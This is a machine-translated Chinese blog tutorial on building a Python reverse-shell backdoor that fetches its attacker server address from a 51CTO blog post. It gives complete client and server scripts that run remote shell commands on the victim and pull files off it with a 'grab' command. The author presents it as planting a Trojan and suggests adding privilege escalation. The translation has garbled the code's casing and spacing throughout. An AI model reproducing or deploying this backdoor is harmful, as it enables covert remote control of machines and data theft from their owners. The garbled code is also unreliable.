Python rebound shell backdoor with 51CTO blog binding

Communication only, communication only.

In addition to 51CTO of course can also use other media, such as Weibo, and so on. You can use 51CTO here.

Idea: There is such a situation, we put a Trojan horse on a machine ~ ~ ~ Inside we will write their own server IP, but may be our IP will change, we can certainly use domain name to solve this problem, but that is not very elegant, and the domain name to Money ~ ~ ~ ~ ~ ~ ~ so we need a middleware!

In saying what is the rebound shell, the advantage of rebound shell is that the attacked host may limit the import, that is, only allow a link to one port, other links are blocked, this time we need to be attacked by the host to actively connect our server, our server just listen to a port, Wait for the attacked host to connect.

Implementation principle:

The target host accesses the 51CTO Web site to obtain the server IP and port that need to be connected.

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/7A/AF/wKiom1awQXPyZvSoAAA33ruNj2U510.png "title=" Clipboard.png "alt=" Wkiom1awqxpyzvsoaaa33runj2u510.png "/>

How to achieve it?

Note: Because it is the nature of education purpose, so there is no more advanced features, more advanced I will not, here is just the simple TCP client,tcp server side

First, create a simple TCP server to listen to the connected TCP CLient.

#coding: Utf-8import socketdef connect ():     ## #初始socket对象      s = socket.socket (Socket.af_inet,socket. SOCK_STREAM)     ## #绑定IP跟端口     s.bind (("IP", PORT)      ## #允许一个连接, self-setting     s.listen (1)         ### Call the Accept method and start listening     conn,addr = s.accept ()     ### Output Client connection information, return result is an IP plus port tuple     print ---> we got a  connection from:  ", addr    ## #循化用于接收发送的命令     while true :         command = raw_input ("shell>")          ## #如果命令中用exit关键词则关闭连接         if  " Exit " in command:            Conn.send ("Exit")             conn.close ()              break         else:            conn.send (command)             PRINT CONN.RECV (1024x768) def  Main ():     connect () if __name__ ==  ' __main__ ':     main ( )

We then create a TCP client to connect to the TCP server side

import socketimport subprocessimport oshost =  "server-side IP" port =  server portdef  connect (Host,port):     s = socket.socket (Socket.af_inet,socket. Sock_stream)     s.connect ((host,port))     while True:         COMMAND = S.RECV (1024x768)          if  "Exit"  in command:             s.close ()             break         else:            ### The command sent over the server is executed through subprocess             cmd =  subprocess. Popen (command,shell=true,stdout=subprocess. Pipe,stderr=subprocess. Pipe,stdin=subprocess. PIPE)             ## #返回标注输出, Errors              s.send (CMD.stdout.read ())              s.send (CMD.stderr.read ()) Def main ():     connect (Host,port) if __name__  ==  ' __main__ ':     main ()

Because there is no decision to connect to the server, so we have to run the server, and then run the client, the results are as follows

650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/7A/AE/wKioL1awQgPAuW6lAABB4NOE1J4807.png "title=" Clipboard2.png "alt=" Wkiol1awqgpauw6laabb4noe1j4807.png "/>

At this point, the first step is complete.

Now we need to put the server IP and port on the 51CTO blog.

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/7A/AE/wKioL1awQiLz-AGuAAC8k3emKDw693.png "title=" Clipboard3.png "alt=" Wkiol1awqilz-aguaac8k3emkdw693.png "/>

Now create an article as shown in the blog post.

Then use requests,BeautifulSoup the two libraries to get the information we want.

Import requests

Import JSON

From BS4 import BeautifulSoup

url = "http://youerning.blog.51cto.com/"

Simply step on the point before getting it.

650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/7A/AE/wKioL1awQmnQw3yfAAB_1Os4TxE572.png "title=" Clipboard4.png "alt=" Wkiol1awqmnqw3yfaab_1os4txe572.png "/>

Through Chrom debug mode, we find the content of this content, such as Div,class, as shown in the class= we found "artcontent mt10", this is the information we want, of course, There are many ways to filter out the information we need with BeautifulSoup, which is not the same.

def gethost (URL):

ret = requests.get (URL). Content

Soup = BeautifulSoup (ret, "Html.parser")

For I in Soup.find_all ("div", class_= "Artcontent mt10"):

If I.string.startswith ("{"):

ret = str (i.string)

ret = json.loads (ret)

return ret["host"], ret["Port"]

Print gethost (URL)

The operation results are as follows

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M01/7A/AF/wKiom1awQjDz-nn0AAANVm3uR7w677.png "title=" Clipboard5.png "alt=" Wkiom1awqjdz-nn0aaanvm3ur7w677.png "/>

At this point, the second part has been completed, the complete code is as follows

Client py File

import socketimport subprocessimport osimport requestsimport jsonfrom bs4  import beautifulsoupurl =  "http://youerning.blog.51cto.com/" Def transfer (S,path):     if os.path.exists (PATH):        f =  Open (Path, "RB")         packet = f.read (1024x768)          while packet !=  "":             s.send (packet)              packet = f.read (1024x768)         s.send ("Done")         f.close () def gethost (URL):     ret  = requests.get (URL). Content    soup = beautifulsoup (ret, "Html.parser" )     for&nbsP;i in soup.find_all ("div", class_= "artcontent mt10"):         if i.string.startswith (" {"):             ret = str (i.string)     ret = json.loads (ret)      return ret["Host"],ret["Port"]def connect (host,port):     s =  socket.socket (Socket.af_inet,socket. Sock_stream)     s.connect ((host,port))     while True:         COMMAND = S.RECV (1024x768)          if  "Exit"  in command:             s.close ()             break         elif  "Grab"  in command:   &nbsP;        grab,path = command.split ("*")              try:                 transfer (S,path)              except Exception,e:                 s.send (str (e))                  pass        else:             cmd = subprocess. Popen (command,shell=true,stdout=subprocess. Pipe,stderr=subprocess. Pipe,stdin=subprocess. PIPE)             s.send (CMD.stdout.read ())              s.Send (CMD.stderr.read ()) Def main ():     host,port =  gethost (URL)      connect (Host,port) Main ()

Server-side py file

#coding:utf-8import socketip =  "Your IP" port =  bound port Def transfer (Conn,command):     conn.send (command)     f = open ("Text.text", "WB")      WHILE TRUE:        BITS = CONN.RECV ( 1024x768)         if  "unable to find out the  File " in bits:            print "-- -- unbale to "            break         if bits.endswith ("Done"):             print  "Done"              f.close ()             break      &nBsp;  f.write (BITS)     f.close () Def connect ():     s  = socket.socket (Socket.af_inet,socket. Sock_stream)     s.bind (("IP", PORT))     s.listen (1)      conn,addr = s.accept ()     print  "---> we got a  connection from:  ",addr    while true:         command = raw_input ("shell>")         if   "Exit"  in command:             Conn.send ("Exit")             conn.close ()              break         elif  "Grab"  in command:       &Nbsp;    transfer (Conn,command)         else:             conn.send (command)              PRINT CONN.RECV (1024x768) def main ():     connect () Main ()

PostScript: In fact, the last two complete Python script, add a transfer function, used to transfer files, is an egg bar, although I do not know what the meaning of eggs, but there are many functions can be added, such as looking for files, to mention the right or anything.

This article is from the "Ear Notebook" blog, please make sure to keep this source http://youerning.blog.51cto.com/10513771/1740646

Python rebound shell backdoor with 51CTO blog binding